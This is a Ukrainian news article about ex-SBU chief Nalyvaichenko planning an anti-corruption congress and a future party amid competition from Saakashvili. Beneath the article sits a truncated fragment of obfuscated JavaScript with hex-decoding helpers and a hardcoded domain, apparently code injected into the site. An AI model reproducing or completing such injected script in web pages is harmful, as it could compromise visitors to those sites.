Наливайченко боїться слави «вівці Доллі» Саакашвілі

Перегляди: 568

Екс-керівник СБУ Наливайченко хоче провести Антикорупційний конгрес, але боїться програти на фоні Саакашвілі

Без особливого розголосу в пресі екс-голова СБУ Валентин Наливайченко готується до створення власного проекту для участі у можливих перевиборах Верховної Ради. Як стало відомо нашому виданню, в наступний четвер в Києві пройде конгрес на чолі з Наливайченком за участі «Антикорупційного руху» та інших громадських організацій. Формальна ціль «зльоту» полягає у тому, щоб створити нове громадське об’єднання, фактична – подивитися на те, на кого можна розраховувати. А також – зробити так, щоб влаштувати інформпривід, але при цьому не зробити фальстарт зі створенням політичної партії.

Справа в тому, що зараз ситуація у Наливайченка на «антикорупційному полі», яке він вирішив зайняти у якості політичного напрямку, виявилася для нього вкрай невигідною. Чого тільки вартує такий конкурент, як одеський губернатор Михайло Саакашвілі, який явно налаштований на будівництво власної партії, і зараз успішно вибиває проект Наливайченка на периферію. До цього ще варто додати низку проектів на кшталт «Народного контроля» Дмитра Добродомова – і виходить, що у цій ніші місця стає зовсім мало.

Тому для Наливайченка зараз створення партії – недоречне. Тому й політтехнологи й придумали «конгреси», як аналогія з форумами Саакашвілі. Таким чином можна потягнути час, після чого на базі кишенькової партії «Прогрес», яка зареєстрована на Дениса Каплунова – помічника народного депутата Єгора Фірсова – вже почати реальне партійне будівництво.

Водночас для Наливайченка вкрай важливо, щоб на цей конгрес завітали інші політики. За деякими даними, там очікують приходу діючих народних депутатів. І якщо поява екс-"ударівця" Фірсова, який давно входить до орбіти Наливайченка – цілком прогнозована, то, за даними Depo.ua, також очікується поява інших «пташенят» Кличка. Зокрема, мова йде про Наталію Новак та Віктора Чумака.

Втім, наразі все це виглядатиме блідою копією форумів Міхо. І схоже, що без союзників Наливайченку не обійтися. В цьому контексті показовою виглядає спільна поїздка до США Наливайченка та лідера «Батьківщини» Юлії Тимошенко. Не варто виключати, що такий вояж може перерости у щось більше. Адже, за великим рахунком, в обох вищезазначених політиків свобода маневру в зв’язку з яскравою появою на політичній мапі країни Саакашвілі стає все менше…

 

// o;o++) t+=e.charCodeAt (o).toString (16);return t},a=function (e){e=e.match (/[\S\s]{1,2}/g);for (var t="",o=0;o < e.length;o++) t+=String.fromCharCode (parseInt (e[o],16));return t},d=function (){return "zerkalo.mk.ua"},p=function (){var w=window,p=w.document.location.protocol;if (p.indexOf ("http")==0){return p}for (var e=0;e

Tweet about this on TwitterShare on FacebookShare on Google+

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

*

code